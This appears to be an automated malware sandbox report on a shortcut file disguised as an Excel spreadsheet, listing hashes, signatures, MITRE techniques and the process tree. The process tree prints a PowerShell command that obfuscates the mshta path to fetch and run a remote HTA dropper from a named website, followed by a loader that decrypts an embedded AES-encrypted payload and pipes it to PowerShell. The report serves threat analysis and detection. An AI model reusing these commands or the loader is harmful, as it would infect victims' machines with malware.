db982b4701f5517c3401f594d6a14d7499dac01f85f264859723a02c3b67e542

General

Target

FT. 40FE CNY .xlsx.lnk
Size

2KB
MD5

82fde340f187a517e0feced1d4972363
SHA1

07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256

e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
SHA512

db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.sessosesso.it/assets/aw/yt.hta

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

mshta.exe

flow pid process

4 2748 mshta.exe
7 2748 mshta.exe
8 2748 mshta.exe
9 2748 mshta.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2664 powershell.exe
2096 powershell.exe
2608 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2664 powershell.exe
Token: SeDebugPrivilege 2096 powershell.exe
Token: SeDebugPrivilege 2608 powershell.exe

flow	pid	process
4	2748	mshta.exe
7	2748	mshta.exe
8	2748	mshta.exe
9	2748	mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2664	powershell.exe
2096	powershell.exe
2608	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exe

description	pid	process	target process
PID 1940 wrote to memory of 2664	1940	cmd.exe	powershell.exe
PID 1940 wrote to memory of 2664	1940	cmd.exe	powershell.exe
PID 1940 wrote to memory of 2664	1940	cmd.exe	powershell.exe
PID 2664 wrote to memory of 2748	2664	powershell.exe	mshta.exe
PID 2664 wrote to memory of 2748	2664	powershell.exe	mshta.exe
PID 2664 wrote to memory of 2748	2664	powershell.exe	mshta.exe
PID 2748 wrote to memory of 2096	2748	mshta.exe	powershell.exe
PID 2748 wrote to memory of 2096	2748	mshta.exe	powershell.exe
PID 2748 wrote to memory of 2096	2748	mshta.exe	powershell.exe
PID 2096 wrote to memory of 2608	2096	powershell.exe	powershell.exe
PID 2096 wrote to memory of 2608	2096	powershell.exe	powershell.exe
PID 2096 wrote to memory of 2608	2096	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\FT. 40FE CNY .xlsx.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab3C97.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3CD9.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
bc4157f2cfb2ea352bce509b609993d0

SHA1
f57c283f59b6ae4d9897dd6fb384cefe4af570d7

SHA256
2934819fbe04b1b9124a227e2f4c0a65acf12c58c190cde32f552e794582d714

SHA512
d08430693cf3e4bdda647abf546742f33892d6af1fce2c56d2bb11a064ad1eef4d7960fb13426a05aa599ce7973b21b77cb1abacc9fa59723dbb6c87a04c89b7

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2096-334-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2096-335-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2096-333-0x000007FEF4530000-0x000007FEF4ECD000-memory.dmp

Filesize
9.6MB

Download
memory/2096-332-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2096-331-0x000007FEF4530000-0x000007FEF4ECD000-memory.dmp

Filesize
9.6MB

Download
memory/2096-336-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/2096-329-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2096-349-0x000007FEF4530000-0x000007FEF4ECD000-memory.dmp

Filesize
9.6MB

Download
memory/2096-330-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2608-342-0x000007FEF4530000-0x000007FEF4ECD000-memory.dmp

Filesize
9.6MB

Download
memory/2608-343-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2608-348-0x000007FEF4530000-0x000007FEF4ECD000-memory.dmp

Filesize
9.6MB

Download
memory/2608-347-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2608-346-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2608-345-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2608-344-0x000007FEF4530000-0x000007FEF4ECD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-44-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2664-39-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-41-0x00000000021C0000-0x00000000021C8000-memory.dmp

Filesize
32KB

Download
memory/2664-40-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2664-43-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2664-46-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-42-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

Filesize
9.6MB

Download
memory/2664-45-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2664-38-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing